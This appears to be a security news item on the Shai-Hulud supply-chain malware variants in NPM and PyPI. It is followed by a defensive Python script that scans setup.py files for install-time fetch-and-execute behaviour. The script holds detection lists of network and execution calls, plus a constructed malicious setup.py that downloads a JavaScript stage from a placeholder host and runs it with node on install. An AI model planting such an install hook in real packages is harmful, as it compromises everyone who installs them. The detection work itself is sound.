SECURITY researchers have reported new iterations of the Shai-Hulud supply chain attack, which have affected over 100 packages across the NPM and PyPI ecosystems since September 2025. The malware, attributed to the hacking group TeamPCP, has been used in multiple campaigns targeting the open source software community, in successive and growing waves. Two notable variants are Miasma and Hades.
- **Miasma Variant**: This variant was involved in the Red Hat incident, infecting 32 packages with a payload that scans for credentials and spreads itself to further packages. By June 5, 57 NPM packages and more than 300 malicious versions had been identified.
- **Hades Variant**: A new branch was found in approximately 19 PyPI packages; it uses a malicious install-time setup script to fetch and execute additional JavaScript code. A second wave targeted 29 further packages. In total, 471 malicious artifacts have been identified across both ecosystems, with bioinformatics and machine learning among the sectors notably affected.
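The fetch-and-execute behaviour described for the Hades variant (a setup script that downloads a second stage and runs it during installation) is something a practitioner can triage statically before installing an sdist, because setuptools runs any `cmdclass` override of `install`, `develop` or `egg_info` with full user privileges at `pip install` time. The following is an added example written for this page, not code from the original article or from any researcher it cites. The indicator lists are an assumed, non-exhaustive heuristic; the two `setup.py` samples are constructed, and the URL in the malicious one is a placeholder, not a real indicator:

```python
"""Static triage of a PyPI sdist's setup.py for install-time fetch-and-execute behaviour.

Added example for this page, not code from the original article or any researcher it
cites. It flags the pattern the Hades description implies: a setup script that both
reaches the network and executes code or spawns a process during 'pip install'. The
indicator sets are an assumed, non-exhaustive heuristic; the samples are constructed.
"""
import ast

# Call leaves treated as network access when their root resolves to a network module.
NETWORK_MODULES = {"urllib", "requests", "http", "socket", "httpx"}
NETWORK_CALLS = {"urlopen", "urlretrieve", "get", "post", "request", "create_connection", "socket"}

# Call leaves treated as code or process execution (plus bare exec()/eval() builtins).
EXEC_MODULES = {"subprocess", "os"}
EXEC_CALLS = {"system", "popen", "Popen", "run", "call", "check_call", "check_output", "execv", "execvp", "spawnl"}

# setuptools command classes that run during installation when overridden via cmdclass.
INSTALL_HOOKS = {"install", "develop", "egg_info", "build_py"}

# Tokens hinting at a JavaScript second stage (the Hades description mentions fetched JS).
JS_TOKENS = {"node", "npm", "npx"}


def _dotted_name(node: ast.AST) -> str:
    """Return 'a.b.c' for an Attribute/Name chain, or '' for anything else (e.g. a Call)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def _import_roots(tree: ast.AST) -> dict:
    """Map each imported local name (including aliases) to its top-level module."""
    roots = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                top = alias.name.split(".")[0]
                roots[alias.asname or top] = top
        elif isinstance(node, ast.ImportFrom) and node.module:
            for alias in node.names:
                roots[alias.asname or alias.name] = node.module.split(".")[0]
    return roots


def triage_setup_py(source: str) -> dict:
    """Return indicator lists and a verdict for one setup.py source string."""
    tree = ast.parse(source)
    roots = _import_roots(tree)
    findings = {"network": [], "exec": [], "js_hints": [], "custom_install": []}

    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if not name:
                continue
            head = name.partition(".")[0]
            leaf = name.rsplit(".", 1)[-1]
            root = roots.get(head, head)          # resolve 'from urllib.request import urlopen'
            if leaf in NETWORK_CALLS and root in NETWORK_MODULES:
                findings["network"].append(f"line {node.lineno}: {name}")
            if name in {"exec", "eval"} or (leaf in EXEC_CALLS and root in EXEC_MODULES):
                findings["exec"].append(f"line {node.lineno}: {name}")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            tokens = node.value.replace("/", " ").split()
            if any(t in JS_TOKENS or t.endswith(".js") for t in tokens):
                findings["js_hints"].append(f"line {node.lineno}: {node.value!r}")
        elif isinstance(node, ast.ClassDef):
            bases = {_dotted_name(b).rsplit(".", 1)[-1] for b in node.bases}
            if bases & INSTALL_HOOKS:
                findings["custom_install"].append(f"line {node.lineno}: class {node.name}")

    # Network access and execution in the same setup script is the fetch-and-execute signature.
    findings["suspicious"] = bool(findings["network"] and findings["exec"])
    return findings


# Constructed sample: an ordinary setup.py with no install-time side effects.
BENIGN_SETUP_PY = '''
from setuptools import setup, find_packages

setup(
    name="example-lib",
    version="1.2.0",
    packages=find_packages(),
    install_requires=["requests>=2.0"],
)
'''

# Constructed sample mimicking the described behaviour; the URL is a placeholder (.invalid TLD).
MALICIOUS_SETUP_PY = '''
import os
import subprocess
from urllib.request import urlopen
from setuptools import setup
from setuptools.command.install import install

STAGE2 = "http://stage.invalid/loader.js"

class PostInstall(install):
    def run(self):
        install.run(self)
        data = urlopen(STAGE2).read()
        with open("/tmp/loader.js", "wb") as fh:
            fh.write(data)
        subprocess.run(["node", "/tmp/loader.js"])

setup(name="example-lib", version="1.2.1", cmdclass={"install": PostInstall})
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP_PY), ("malicious", MALICIOUS_SETUP_PY)):
        print(label, triage_setup_py(src))
```

Run it against an extracted sdist (`pip download --no-binary :all: --no-deps <pkg>`, then unpack the tarball) before installing; a `suspicious` verdict, or any `custom_install` hit in a package that has no reason to customise installation, is grounds to inspect the script by hand rather than install it. The heuristic deliberately ignores calls it cannot resolve to a module, so obfuscated loaders (`getattr(__import__("os"), "system")`) will slip past it; treat it as a triage filter, not a verdict.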